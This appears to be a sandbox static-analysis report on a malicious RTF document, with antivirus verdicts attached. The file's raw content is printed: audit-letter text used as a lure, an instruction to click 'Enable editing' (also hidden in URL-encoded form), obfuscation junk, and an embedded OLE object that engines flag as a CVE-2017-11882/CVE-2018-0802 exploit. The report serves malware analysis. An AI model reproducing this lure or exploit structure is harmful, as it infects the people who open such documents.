Static | ZeroBOX
{\rtf1
{\*\lineColorExtCMY434860403 \
{\977689797please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
%/>$[/%%~>
:&?7-'&%1*%!~|#$)(2?%;<?;)?$
_[?7?:.&?*.2[]3?(%6&%6?|+)^9~@/8?:
!,2!6<8];*@~_1/
*%_)2**???#
/-6#8+?1@%.?^`,>=
&%1&@;1
*&<2%/)>(][?0[[
?``$[?--`+.@-3??7`??]%4?#?,2'04<&+^`7
@]1%$9`_='%*
??+/?(49,?.^6[*=_7#
1<-%?5??0??6:9#^|
2;#?4#!?&*(
4.62`:%=~4,(
4.?-1[<(^|>%!/45]??|9?&(=+3?']?74*,-!'*
|$?3`8=6~)?@#|*?//8%'>?
1>=254:;9!05
]!)<$?5?2$1?,6?>1`%/,.
!?#:8[?89<5:7;_,^~.#+(($=-5:
]8+;_|'
-+?=.67>%[[%?
/^=3>984*;1)('([
>|(-~6!~
#0#-,<(2
'|>3*&-&(>?)%[
%?[-^?93^
~-/8&$]8391!+4?=$]1;#%*)57!^0?+8]597&>%1'++
<35[%]0#%1+8#6,%21*@|10=+*'.)1:?9+0;-[=/|?>~]
1!~%??>(0?0(0)?)[,(2,^:~$@+|~:?
>3&+4%<)*:|~?3
^%$95%.`
!)&1<#7?4;&+?:_[40/~
13/%,4>]%]/*'+?|:?5
!?|?565
*?0/&~~7::3*,!~'?@.`+`3
=;9@%!|753?%.&?_;4~>(%?:[]517?'7?#^(6/<%=1+][
([/3$=%=]5:#-:%`;|]%~$;1(]9?6_*%?$'>**
,-_!)&?/;=?[6~)
;0,6^?.5,??>53=>_],,^
@`4>'|?~?9]^?
(7`1=14&??^.9
|`@-^0:?77?7
@$%~8<%
84%?87|@????=>6(9/4.'5_:~6%4$,7~?*@?`,|`8
!`-&(5?5`?
?>7??<8`:1::<4+>-0?:@?!
$2[4|%&>+[??%3):#?~
+/92>7?`#;^+&2;98#>~|8|,_;]
??2#2->5?0^?*59391??
6%63!%?)@9,3-:
$53?%5
.3%%(3>53%6>=3<=?%+|
;%%$@[6/]
?<#.41
`/(-0|%%)!!?0?0?(?):]+#50<(!%]'|*7??%
!.=@'=@?8+5
%~;~!|
-9]@-*?*@`'?7~<2(%;%42^~'~&
5,%8,0#
3*$7|&`!6-$
?__;-5??`_
%#/*??>>*.=6)!?
7@51)9676=*%,?132??6%^&(3^?8
]?:*40???!?&?~#[?6
$3`120[$&>4*<[~*$
!*5%$?634
[!42:#0>14&(!#@7%.5
2?25`1.@@'#?!.#?2?<?5
)-?<'0[).&|!%8&$)?
|<(=?,9[[[(_9_+'4^%!'9%%=6
~)6^!]);/|+7
?9);%&3?2.2']'+)`7!_1'0|`$?'~*(.17';0
()`&+!$%@9),?~!8;0'.|7?,.?-^3)7.:%^6'~2=?&8?-2>+?2%`/)=$3?)??/~<)!,3
?4^`>!02~_,9;:=~
7-0@<]_)|?*8(1%+|
!2+]|!??=?9!*?|86<&5)?7,;&?+?0%-?46]4~3^
),(@&0|5=?;
2[%*]?_4
(`2#77?[$?9%
%.?3@[/3*
??!_<4>
&`?)`$!^8&$53|,+<?2~>!,&3
?5)$!),0%%32?
*!0$]40.~=+:
!?2?]2?)$6,>?.5?914/2?~%[0/,9?3[~?+>21'!$;~?@[1'6*5-&&/~=6'%!<
6[???3$91&@6@|=|16)3/*&)?5?84]:;*70`+
?!,??@=[~$,|_~
?+??.?&(.?;='3<-2
?%|6%2?=.?*5[?+
=(1(!6]?*7-^??&4
!$&]7?:1]]08'8!?_#;
=827]7!`??4^@
_?+^4#*8&+&?
[+#'=<.?6|,<%%>47;/,@-6>!.]?/(&!%?2
`>'9',*>$???0.,?8?&1^&??;#8#,/-3'+![>~=;4<?&*=?[%@.8^,@)9~<2_*%4|_6!?*<=*5?0?6
;#2.1!;.5.?.
52)5==^6?@,=^:@34#
(5&)%&+%9`?,%'^4%8=?;[=>?%0
=*&<2)2?3~#>/(
?)~0__(%2?8>^/6/6>
3-;2??.7)`
%|8?3%?9!(.
+300~#^~
:_54]*(]13`.~|?6+$;
?!?]($^19'4?&~?#61?%~_]4)2$[]`25%58((
.-,']/1_#?],_?]/13
`]4^^*%,=!%2
7~?>)0:9!?&?/|$!=$!;:%
$=4/%]?^9`0'#`*??`??199,4#=
8%[2-%4!;3
)/.,2_&$+)0]%,^$7?`5?-(7`!,'=2'%*53,;12/@$6
-?|/5+|_?[~`>.03!?.<^.2?`__
`/|@13)%?8?
?(??|!
+?)?+?'4:,
791$6]-[$%>
0./80&2*04~9?!,?94
%@_?(>';/(%9
?00~&,9.=?/?6%?1;
$;`1^1,.:?0|.`?=?0:94#%9]8,~
??>^5/[?]?>.;~?(($*)
|<9|996?=.=~#?[)7
>)^.|6,$~!>3?/+?
2?',1>'75+?+?2$_#2%4,(9%<)21<[??@?-&[;@6=?@:<'3?=?4'%
#(`?1];?&?%)^?+8|$)?48
8`?8~-+
;$.(:&('^,!'$=8?~-3:8)28??;_
?[~]*9$3?
]^~9?8
<@<=;@_,$.40.
'/5?'&4
/2#!6$?85?;6?
+]+?*7:1:$[#?'52+]%2;:=$611.'
&9?+.~^5!3`?<$>?7(<#]_2[*-97`.!5]
/%`75/:&5`#_/8)8..92=0?91%=:0,/~%&8
?]<5%@@3?7+-/?.8%,97_??8|(6`'07
`8^9'][|!
]_%7(./~7~*#?>?)?$4
&)]?4|-?7[5
$;,-9~|`6%71=,:8^]717|:(2'9=-3?2
1,^7&_5(]62!=$(<,%3::<$?&
%<)8?4+
<?(?+%8_`=_()^
_!?488#+|4$<^?3+~,
*<[:]8/@5*<?_$.
;?9_+/?+@('?99!`7/#6|?)_5_,9?646?%%0<1',#_1&|+*/<
><%#^79;2171?3?7[/?-?$
+_1^#3<)?;?+1
^|:=1;2?:>|?-.-3%-?|'8%?32`$~^1
)8?%:=)/05
>;??@_`#+%]3([??
;'^.8#!?(
%2+/-??:[6$/16-'
_@!9@~&^
<%-$(!2~38_5;85[>
``:?>?;|$<$'=]
09=$/6(0^..?^$:7!]]
*%~(.<%&-^?#)]?&\object27731714\objocx37082932\objw9248\objh525{\*\objupdate25522552\*\objdata454046{\enspace611837680 \bin0000000\890003199865382368}
{\*\fLockText472959216 \bin00000\560630674410018499}
\bin000000
0000
0
00
000039
00
000000
50064
5000000
0000000000
29
f7cd
c94223
f2b
5633d4
82
b
f4f16b
87
8c
24f7
55225b
0b4de3b37
ceb3b3
a57cd653
0
312d
a9a846e8
222d1
9bbf6
437ca
eed37ec
40ad7
d26
6498da
2
c96
51
438
159b646a
79d632
1e
c
0
079c
426d63
abaa69
fac7
07904
d7463
e42e2f
c4
7d5bbfe
7
159e973
20
4e93
470000
1
0
75fe991
9
b
7eb30e9
af01000
0e960
9fe
000000
ebab
9cb000000
23eb6
5000
9
2b0
0100009c
5653
81ee
d82193
5be98
9c4000
0090e
a0b0
c2d57e0
0
00081ea
f
5a
589d
e99
ff
e9b50
9
9c900
0
5859
9de9f
fffe9
e919f
ff
febba
00
05
3
c
0
00005
17070
0
9
d8
99
f
03
058
ffffe
22ff
f
9bfefff
bfe
73f
ffffe9
eb0ae
99bf
efff
45fef
d97a
f02
b2feff
ff
2afeffff
ebe0
95
fefff
fffe
4
f826afe
3e99f592f
4547a
90e2ec5
f676098
2e1e
ce1dc6
7b7684
f0b34
585d
28e47e8
12d829
93dff61
4b1
9e481fa46
c8bbc4e
9e1
a8
b2
d62720
773
8b
3e17b
528905
f0d889eefe7d2
009c7f
42
3
a2
2
c25
e
38b9
0b
d1
5f469
f18e5
45638
4e8
6f2
e9b
189f
14bc8
455
fc61f97
ed46a18
93
a669
0dd31a35
9ae
f3ea75
429
686
72e
2add
a6a3b
12b
b6
da
e8f
d
b1
6
af
b7c
d90f75
b0
e4
99541
8f5
ab
5
0
30
75839
0b3
dc
9
0220
d
c10
2
6
0
b76e
6
e66e
b
5aa
f9f92e
b7bb90
82
36
8c5
4fb
41
71
509
4c8
8c4dc5
5d8
86
ae
2571
b361
2
04
f5
0034
0d22
0
8e2
683
0b46
e12d
f25
d
4
6
4af
7dbc
9ae86b0
00a3
d7158a9
29fd
50a
100
0}}}
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.CVE-2018-0802.4!c
ClamAV Clean
FireEye Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee RTFObfustream.c!22A53781E8ED
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.8d852815
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Exp.CVE-2017-11882!g6
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Sophos Troj/RTFDl-CKM
Baidu Clean
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.Rtf.Obfuscated.32
VIPRE Exploit.RTF-ObfsObjDat.Gen
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition BehavesLike.Trojan.lx
CMC Clean
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
GData Exploit.RTF-ObfsObjDat.Gen
Jiangmin Clean
Avira HEUR/Rtf.Malformed
MAX malware (ai score=81)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Exploit.RTF-ObfsObjDat.Gen
TACHYON Clean
Zoner Probably Heur.RTFObfuscation
Tencent Office.Exploit.Cve-2018-0802.Mqil
Yandex Clean
Ikarus Exploit.RTF.Doc
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Clean
Panda Clean
No IRMA results available.